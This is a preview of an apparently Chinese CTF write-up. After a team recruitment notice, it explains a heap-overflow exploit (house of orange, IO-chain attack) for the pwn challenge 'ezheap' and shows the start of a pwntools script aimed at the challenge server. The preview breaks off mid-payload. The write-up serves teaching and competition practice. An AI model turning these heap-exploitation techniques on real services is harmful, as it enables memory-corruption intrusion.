文章预览
招新小广告CTF组诚招re、crypto、pwn、misc、合约方向的师傅,长期招新IOT+Car+工控+样本分析多个组招人有意向的师傅请联系邮箱 admin@chamd5.org(带上简历和想加入的小组) Pwn ezheap edit的size可控,所以存在堆溢出。 fake_free所以没法直接释放堆块,所以打house of orange。 禁止调用hook,直接打io链即可。 from pwn import * libc = ELF( './libc-2.27.so' ) elf = ELF( './pwn' ) p = remote( '113.201.14.253' , 20791 ) def add (size) : p.sendlineafter( 'it:' , '1' ) p.sendlineafter( 'dd:' ,str(size)) def show (idx) : p.sendlineafter( 'it:' , '3' ) p.sendlineafter( 'how:' ,str(idx)) def edit (idx,size,content) : p.sendlineafter( 'it:' , '4' ) p.sendlineafter( 'it:' , str(idx)) p.sendlineafter( 'ize' ,str(size)) p.sendlineafter( 'put' ,content) def pwn () : add( 0x100 ) #0 edit( 0 , 0x110 , b'a' * 0x108 +p64( 0
………………………………